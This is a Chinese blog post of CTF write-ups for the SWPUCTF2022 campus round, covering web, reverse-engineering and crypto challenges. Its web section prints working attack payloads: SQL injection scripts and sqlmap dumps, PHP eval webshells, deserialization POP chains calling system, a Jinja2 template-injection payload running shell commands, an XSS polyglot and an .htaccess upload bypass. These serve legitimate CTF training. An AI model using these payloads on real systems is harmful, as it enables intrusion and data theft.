SWPUCTF2022 校内赛道部分 wp

已于 2024-02-27 16:59:10 修改
阅读量1.4k 收藏 3
点赞数 1
分类专栏: CTF 文章标签: php web安全 网络安全
于 2022-10-26 00:34:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjprolus/article/details/127524889
版权

文章目录

部分wp来自 2022 SWPUCTF Web Writeup问谛居 - 欢迎做客问谛居 (wd-ljt.com),榜一大佬,Tony师傅,没有完全按题目顺序写题解,无pwn和部分类型题目的题解

GitHub版本:yjprolus/SWPUCTF2022: SWPUCTF2022 wp (github.com)

web

欢迎来到Web安全

查看源码搜索 swpu 得到flag

easy_sql

源码提示参数为 wllm

sqlmap -u "http://175.24.172.136:30083/?wllm=1" -D test_db -T test_tb -C fllaag --dump

sqlmap -u "http://175.24.172.136:30071/?wllm=1" -D test_peng -T test_2tb -C ffflllaaaggg --dump # 迷惑性选项

happy_rce

访问 next.php,根据提示访 问 jiangnaij.php

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $ip)){
      die('换个方法吧?被过滤啦!');
  }
  eval($ip);
}
?>

蚁剑连接 http://175.24.172.136:30023/jiangnaij.php?url=eval($_POST[%27yjprolus%27]); ,密码为 yjprolus,文件管理定位到根目录下找到 flag

happy_php

<?php
highlight_file(__FILE__);
error_reporting(0);
$a=0.58;
if (!preg_match('/[^0-9]/',$_GET['jiangnaij'])){
    if ((int)(substr(md5($_GET['jiangnaij']),0,6)) === 666666) {
        if (isset($_POST['pysnow']) and isset($_POST['M1sery']))
        {
            if ($_POST['pysnow'] != $_POST['M1sery'])
            {
                if (md5($_POST['pysnow']) == md5($_POST['M1sery'])){
                    if (isset($_POST['s0rry']) and isset($_POST['DSTBP']))
                    {
                        if ((string)$_POST['s0rry'] != (string)$_POST['DSTBP'])
                        {
                            if (md5($_POST['s0rry']) === md5($_POST['DSTBP'])) 
                            {
                                if ($_GET['csc8'] == intval($a * 100)){
                                    include '/flag.php';
                                    echo $flag;
                                }
                                else echo "csc8说你错了";
                            }
                            else echo 's0rry和DSTBP说你错了';
                        }
                        else echo "请输入不同的s0rry,DSTBP";
                    }
                    else echo "s0rry和DSTBP说快来玩";
                }
                else echo 'pysnow和M1sery说你错了';
            }
            else echo "请输入不同的pysnow,M1sery";
        }
        else echo "pysnow和M1sery说快来玩";
    }
    else echo "相等吗???";
}
else echo "输入一个数,这个数md5加密后前六位全是6!";
相等吗???

用下面的脚本爆破得到md5加密后前六位全是6的数:

# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.digits

def cmp_md5(substr, stop_event, str_len, start=0, size=20):
    global CHARS
    while not stop_event.is_set():
        rnds = ''.join(random.choice(CHARS) for _ in range(size))
        md5 = hashlib.md5(rnds.encode('utf-8'))
        if md5.hexdigest()[start: start+str_len] == substr:
            print(rnds)
            stop_event.set()


substr = sys.argv[1].strip()
start_pos = int(sys.argv[2]) if len(sys.argv) > 1 else 0
str_len = len(substr)
cpus = multiprocessing.cpu_count()
stop_event = multiprocessing.Event()
processes = [multiprocessing.Process(target=cmp_md5, args=(substr,
                                        stop_event, str_len, start_pos))
                for i in range(cpus)]
for p in processes:
    p.start()
for p in processes:
    p.join()

'''
python ch_md5.py "666666" 0  # 命令行运行,得到如下结果 
61146528383226743337

?jiangnaij=61146528383226743337&csc8=57

'''

(string)$_POST['s0rry'] != (string)$_POST['DSTBP'] 部分为md5碰撞。先用 hackbar 发送原来的请求,BP抓包,发到 Repeater ,再粘贴一次POST的值即可,多测试几次(做法来自https://www.bilibili.com/video/BV1514y1s7od/?spm_id_from=333.337.search-card.all.click&vd_source=f7d99068aaef12987e4f91ab71f0546a&t=395.9,误打误撞搞出来了,但是原理很简单)

GET http://175.24.172.136:30070/?jiangnaij=61146528383226743337&csc8=57

POST pysnow[]=NKCDZO&M1sery[]=40610708&s0rry=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&DSTBP=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

do_not_wakeup

序列化得 O:1:"A":1:{s:19:"Aare_you_a_hacker";s:9:"yesyesyes";} ,修改绕过wakeup得 O:1:“A”:1:{s:19:“Aare_you_a_hacker”;s:9:“yesyesyes”;} ,URL编码后payload如下: data=O%3A1%3A%22A%22%3A5%3A%7Bs%3A19%3A%22%00A%00are_you_a_hacker%22%3Bs%3A9%3A%22yesyesyes%22%3B%7D

<?php
class A
{
    private $are_you_a_hacker='yesyesyes';
}
$a=new A();
echo(urlencode(serialize($a)));
?>

can you faster

本来以为是 gunicorn20.0.4请求走私,后面发现是道爆破题,参考 ACT Team 的代码:

import requests
import time
from bs4 import BeautifulSoup

url = 'http://175.24.172.136:30041/'
s = requests.session()
for i in range(200):
 print(i)
 res = s.get(url)
 soup = BeautifulSoup(res.text,'html.parser')
 get_express = soup.find_all('a')[2].text
 get_express = get_express.replace('=','')
 exres = eval(get_express)
 time.sleep(1)
 data = {
  'result':exres,
  'submit': '提交'}
 r = s.post(url,data=data)
#  print(r.text) 
 if 'swpu{' in r.text:
  print(r.text)
  break

ez_include

GET /?key=json_last_error 返回0 弱类型比较

POST

file=php://filter/convert.%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

newnew

考点应该是PHP原生类,根据搜索得到的结果尝试 DirectoryIterator、FilesystemIterator、SplFileObject、GlobIterator得到payload:O:1:"A":3:{s:1:"a";s:13:"SplFileObject";s:1:"b";s:12:"/fl1aaaaaaa9";},构造方法如下:

<?php

class A
{
    public $a;
    public $b;

    public function __destruct()
    {
        echo new $this->a($this->b);  
    }
}

$exp=new A();
$exp->a='SplFileObject'; // DirectoryIterator FilesystemIterator SplFileObject  GlobIterator ReflectionClass ReflectionMethod
$exp->b='/fl1aaaaaaa9';   // glob:///*   fl1aaaaaaa9
// echo new $exp->a($exp->b);
echo(serialize($exp));

easy_java

不会~

easy_flask

ssti注入漏洞,payload如下

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat flag").read()') }} # ls 查看得到当前为 / 目录且flag文件在此处
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

easy_xss

hackbar 的 payload 弹flag字段即可得到flag

jaVasCript:/*-/*/`/'/"/**/(/ */oNcliCk=alert(“flag”) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/–!>\x3csVg/<sVg/oNloAd=alert(“flag”)//>\x3e`

baby_pop

<?php
highlight_file(__FILE__);
error_reporting(0);
include "class.php";

if (isset($_GET['source'])) {
    show_source("class.php");
} else {
    unserialize($_GET['pop']);
}

?source=1 进入下一步

class dstbp
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        ($this->cmd)($this->content);
    }
}

class m1sery
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: 2.5 years";
    }


}

class s0rry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }


    public function __destruct()
    {
        echo $this->hint;
    }


}

class jiangnaij
{
    protected $code;


    public function __call($name, $arguments)
    {
        ($this->code)();
    }
}

ACT Team 的 exp 如下:

<?php

class dstbp
{
    private $cmd;
    private $content;

    public function __construct()
    {
        $this->cmd = 'system';
        $this->content = 'cat /flag';
    }
}

class m1sery
{
    public $ctf;
    public $time;
}

class s0rry
{
    private $name;
    private $password;
    public $hint;
    public $key;
}

class jiangnaij
{
    protected $code;
    public function __construct()
    {
        $this->code = new dstbp();
    }
}
$j = new jiangnaij();
$m = new m1sery();
$m->ctf = $j;
$s = new s0rry();
$s->hint = $m;
echo urlencode(serialize($s));

php_upload

文件上传后,直接包含!

$wllm = waf($_GET["wllm"]);
include("$wllm");

先传图片木马,之后包含 ?wllm=upload/546abe96bee75c6fda395809c08708d1/m.gif,既可getshell.

ez_upload

.htaccess利用,base64编码绕过 <检测。修改MIME为jpg类型

php_value auto_append_file "php://filter/convert.base64-decode/resource=Tao.php"

# Tao.php 内容如下:
PD9waHAgZWNobyAiVGFvIjtldmFsKCRfUkVRVUVTVFswXSk7Pz4=
# 解码为:
# <?php echo "Tao";eval($_REQUEST[0]);?>

之后anstword bypass disable_functions

或者

?0=var_dump(new DirectoryIterator("glob:///f*"));
# /fllllllllllll4g
?0=mkdir('Tao');chdir('Tao');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo (file_get_contents('fllllllllllll4g'));

baby_ssrf

flag1

POST url=http://sudo.cc/flag.php -> swpu{werefgou-

flag2

访问 /.git 得到,/.svn是迷惑选项

flag3

源码泄露扫描出www.zip/wwwroot.zip/backup.sql,flag在/wwwroot.zip下的flag3.txt中

sql2

extractvalue报错注入,大小写绕过关键词过滤,/**/绕过空格过滤


?wllm='/**/And/**/extractvalue(rand(),Concat(CHAR(126),user(),CHAR(126)))%23

/?wllm='/**/And/**/extractvalue(rand(),Concat(CHAR(126),(Select/**/Group_Concat(database_name)/**/From/**/mysql.innodb_table_stats),CHAR(126)))%23
# XPATH syntax error: '~mysql,test_db,test_db~'

/?wllm='/**/And/**/extractvalue(rand(),Concat(CHAR(126),(Select/**/Group_Concat(database_name)/**/From/**/mysql.innodb_table_stats),CHAR(126)))%23
# '~gtid_slave_pos,test_tb,users~'

无列名注入

/?wllm='/**/And/**/extractvalue(rand(),Concat(CHAR(126),(Select/**/`2`/**/From(Select/**/1,2/**/Union/**/Select/**/*/**/From/**/test_tb)a/**/Limit/**/1,1),CHAR(126)))%23  
# XPATH syntax error: '~swpu{aba16000-448a-4bfb-874f-7d'

/?wllm='/**/And/**/extractvalue(rand(),Concat(CHAR(126),(Select/**/Reverse(`2`)/**/From(Select/**/1,2/**/Union/**/Select/**/*/**/From/**/test_tb)a/**/Limit/**/1,1),CHAR(126)))%23

XPATH syntax error: '~}69e2a4f858d7-f478-bfb4-a844-00'

其实盲注也是可以的,具体见sql3

sql3

import requests
import time
# swpu_wllm_boolsql
# gtid_slave_pos,flag,username
# id,username,password,id,flag

def inject(url):
 name = ''

 for i in range(1,100000):
  low = 32
  high = 128
  mid = (low + high) // 2
  while low < high:
   #payload = '0\"/**/or/**/iF(Ascii(Substr((Select/**/Group_concat(table_name)/**/From/**/mysql.innodb_table_stats),%d,1))>%d,Sleep(1),0)#' % (i,mid)
   #print(payload)
   #payload = '0\"/**/or/**/If(Ascii(Substr((Select/**/Group_concat(column_name)/**/From/**/information_schema.columns/**/Where/**/table_schema=0x737770755F776C6C6D5F626F6F6C73716C),%d,1))>%d,Sleep(1),0)#'  % (i,mid)
   payload = '0\"/**/or/**/If(Ascii(Substr((Select/**/Group_concat(flag)/**/From/**/username),%d,1))>%d,Sleep(1),0)#'  % (i,mid)
   print(payload)
   params = {'username':payload}
   start_time = time.time() # 注入前的系统时间
   r = requests.post(url,data = params)
   end_time = time.time()  #  注入后的时间
   if end_time - start_time > 1:
    low = mid + 1
   else:
    high = mid
   mid = (low + high) // 2

  if mid == 32:
   break
  name = name + chr(mid) 
  print(name)

inject("http://175.24.172.136:30063/")

misc

见出题人笔记:SWPU NSS 2022 秋季招新赛 Misc 出题人笔记 - 问谛居

reverse

一道简单的签到

记事本/010Editor打开搜索 swpu 得到flag:swpu{youfindthesecret!!}

xor

ida打开定位到核心代码段:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

py爆破计算

key='SWPU'
flag=''
result=[32,32,32,32,40,46,63,32,12,48,53,33,12,36,96,39,33,46,119,38,12,49,60,52,52,42]
for i in range(len(result)):
    flag+=chr(result[i]^ord(key[i%4]))
print(flag)  # swpu{you_get_s0rry's_flag}

SUPX

64base

import base64
a = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
c = '2T3M3xJr3wqT4tfeuenTq9mNwBvOsdzJ1hQ='
table = str.maketrans(a,b)
d = c.translate(table)
data = base64.b64decode(d)
print(data) # swpu{Qud7y1DPCwB31ZUrH6ml}

swpu_easy_android

反编译得到 check 类,在 idea 中运行测试得到密码为 f53720bd5d9f07a8dc1028df48b8e1bb ,登录进下一个界面。然后根据提示图片识图得到70个字符,10个一组分成7行组成一个迷宫

图源校赛榜一大佬

根据hint得到flag:wllm{ssaaasaassdddwf537}

pyc大挑战

uncompyle6 -o rc4.py rc4.pyc 反编译得到源码

def init(key):
    sBox = []
    index = 0
    k = []
    for i in range(256):
        sBox.append(i)
        k.append(ord(key[(i % len(key))]))
    for i in range(256):
        index = (index + sBox[i] + k[i]) % 256
        sBox[i], sBox[index] = sBox[index], sBox[i]
    return sBox


def rc4_crypt(data, sBox):
    i = 0
    j = 0
    t = 0
    for k in range(len(data)):
        i = (i + 1) % 256
        j = (j + sBox[i]) % 256
        sBox[i], sBox[j] = sBox[j], sBox[i]
        t = (sBox[i] + sBox[j]) % 256
        data[k] ^= sBox[t]
    return data


def data_to_str(data):
    str = ''
    for i in range(len(data)):
        str += chr(data[i])
    return str


def str_to_data(str):
    d = []
    for i in range(len(str)):
        d.append(ord(str[i]))
    return d


data = [ 115, 119, 112, 117, 123, 114, 99, 52, 95, 49, 115, 95, 101, 52, 115, 121, 125]
flag = input('请输入flag:')
key = 'wllm'
sBox = init(key)
flag = str_to_data(flag)
res = rc4_crypt(flag, sBox)
if flag == res:
    print('yes')
else:
    print('wrong')

crypto

善哉善哉

010Editor打开,末尾有摩斯密码:

在这里插入图片描述

新佛曰解码得:施主,此次前来,不知有何贵干?

再根据文件的属性中提示的MD5加密得到 NSSCTF{7551772a99379ed0ae6015a470c1e335}

All in Base

赛后听解出来的说,有个base92/45

AES

网站 AES在线加密解密工具 - MKLab在线工具 解密,选项设置为 nopadding 128位。

爆破MD5

#coding: utf-8
import hashlib
dic = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-'
dic0=dic.to
for a in dic:
    for b in dic:
        for c in dic:
            for d in dic:
                # flag = 'Boom_MD5' + str(a) + str(b) + + str(c) + + str(d)
                flag = 'Boom_MD5'+a+b+c+d
                md5 = hashlib.md5(flag.encode('utf-8')).hexdigest()
                if md5[:27] == "0618ac93d4631df725bceea74d0":
                    print(flag)
print("over")
# data = 'Boom_MD5****'
# Boom_MD5_NSS
# 0618ac93d4631df725bceea74d0*****
# NSSCTF{0618ac93d4631df725bceea74d0fe071}

Welcome to Modern Cryptography

直接用 在线RSA私钥加密解密、RSA private key encryption and decryption–查错网 (chacuo.net) 解密

yjprolus
关注
专栏目录
2022校内小车程序源码+学习说明.zip
01-14
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞项目学习资料,作为参考学习借鉴。 ...2022校内小车程序源码+学习说明.zip
2021-2022收藏的精品资料2021-2022年互联网校内项目计划书模板.doc
09-16
2021-2022收藏的精品资料
2022 SWPUCTF Web+Crypto方向wp
ph0ebus的博客
10-29 6753
简单阅读代码可以发现,__wakeup()方法会首先被激活,覆盖变量的值使flag不能被回显,因此这里需要绕过__wakeup()方法,__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。然后想办法读取文件,cat tac tail都被过滤了,那我们还可以利用nl查看文件内容,这里发现数字被过滤了,我们想到了*来匹配,但是*也被过滤了,尽管如此,我们还可以用?但是里面没有看到类似flag的东西,那就进入根目录看看,但是空格被过滤了,可以用${IFS}绕过。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 4232
SWPUCTF 2022新生
NSS [SWPUCTF 2022 新生]funny_php
最新发布
Jay17的博客
07-29 634
NSS [SWPUCTF 2022 新生]funny_php
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 752
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
SWPUCTF 2022 新生 Does your nc work?
2301_79793667的博客
12-12 143
发现直接问我们问我们问题,让我们输入答案,直接ls查看目录,找flag最可能在的位置,然后运用cd和cat指令,搜查出flag的位置,找到了flag。首先打开环境,发现并没有附件,那我们直接进行nc连接看一下。
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3553
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php
2021-2022收藏的精品资料2021-2022年大学生校内创业计划——旧书买卖.doc
09-16
【大学生校内创业计划——旧书买卖】 大学生校内创业计划书主要针对旧书买卖,旨在纠正大学生的就业观念,增强社会实践和创业能力。该计划名为"订旧书服务",核心业务是在考试期间和结束后收购旧书,然后在开学时...
2022数学建模校内选拔答题要求与题目.docx
07-12
2022数学建模校内选拔答题要求与题目》 数学建模是一项集数学理论、实际问题解决和团队协作能力于一体的竞活动。2022年的数学建模校内选拔旨在选拔优秀的学生队伍,为全国大做准备。参者需以三人小组的...
NSS周常刷密码(3)
arcuied
06-10 594
一开始以为是base92 base85之类的,这种题要知道flag的格式就比较好做,可以直接找找规律。很接近flag的格式,发现非字母对应的地方有点问题,考虑到题目说凯撒5号。查wp得知要过md5,这个当时的题应该有说的(然而也未必) 复现没这句话。这题应该也是当时给了第一句话让我们倒推key。(M+kr)**e 同余 c mod n。发现像盲文的东西只有三个字符来回出现。n1/n2 约等于 q1/q2。于是p3开三次得到p就行了。已知 n1/n2 = p1。梭出来的大小写有点问题。base64->键盘。
SWPUCTF 2022 新生(更新中)
打打CTF
03-25 843
在线练习地址:https://www.nssctf.cn/problem/sheet/14364
unctf2022 md5-1 (python实现MD5碰撞)
weixin_47623063的博客
11-23 1064
unctf2022 MD5-1 (python实现MD5碰撞)
[SWPUCTF 2022 新生]奇妙的MD5
m0_73612768的博客
01-16 838
奇妙的字符串;线索在源码里;MD5 弱比较;MD5 强比较;
[SWPUCTF 2022 新生]奇妙的MD5... ...
2401_82985722的博客
05-28 958
第三层:GET传参?第一层:POST传参 gdou[]=1&ctf[]=2,(===强比较,[]数组绕过)字符串的弱比较,可以用114514a(字符串)来绕过,解析后仍为114514(整型)F12查看源码,在/dist/index.umd.js中发现一个关于flag的路径。输入想要获取的数据库名称,使用万能密码1’ or ‘1’=’1爆破。二者值不相等,但MD5加密后相等,===强比较 使用[]绕过。第四层:flag传入空值 flag= ,返回。==弱比较,使用0e、[]数组绕过都可以。
NSS [SWPUCTF 2022 新生]funny_web
Jay17的博客
07-09 342
NSS [SWPUCTF 2022 新生]funny_web
[SWPUCTF 2022 新生]善哉善哉(隐写,新佛曰,MD5)
2302_80322812的博客
06-16 418
我们看到:和新佛曰解码错误的placeholder几乎一模一样,但其实不是解码失败的placeholder,最后一个问号被替换成了中文问号。最后一步md5,没有说明编码,尝试utf8和gbk。我们看到:题目就是一张图片便联想到隐写术。最后面有一段摩斯密码,破译后得到。易知道这是新佛曰密码,解密后得到。首先查看图片的详细信息我们看到。又看到有关MD5加密。
【无标题】
2301_79880442的博客
04-23 1110
包含三个if条件:1.get传参aaa,2.post传参admin和root_pwd,二者传入的值不能够相同,但是sha1值要相等,相等就成功进入level 3.3.post传参level_3,对其进行后,如果就会输出flag。第一个的绕过:preg_replace 函数执行一个正则表达式的搜索和替换。它会把传入的level替换为filtered.但是该函数只会搜索第一行的字符串,所以就可以用换行符替换。其中%0a是换行符,%23是#
ctf新生miac
07-01
"CTF"全称为Capture the Flag,即网络安全夺旗比,是一种常见的网络安全形式,旨在提升参者的安全技能和团队协作能力。新生通常是指针对初次接触CTF的新手或学生举办的入门级别比,比如"Miac"可能是一个特定的CTF活动名称。 "Miac新生"可能是某个组织为了帮助新入行的网络安全爱好者熟悉CTF环境、技术和流程而设立的比项目。这类比可能会包含基础的网络安全知识题、密码学挑战、web漏洞挖掘、二进制逆向工程等内容,旨在让参者通过实践学习并逐步提升网络安全技能。 具体到"Miac新生",可能的特点包括: 1. 题目难度适中:适合新手,题目涵盖的知识点浅显易懂,有助于初学者建立起基本概念。 2. 实战性强:参与者可能需要通过实际操作来解决谜题,增加动手能力和实战经验。 3. 教育与娱乐并重:在紧张刺激的比中,也注重培养参者的兴趣和团队合作精神。 4. 可能会提供教育资源:如教程、文档和讨论区,帮助选手后进一步学习。 如果你对"Miac新生"感兴趣,你可以询问以下问题来获取更多信息:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yjprolus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值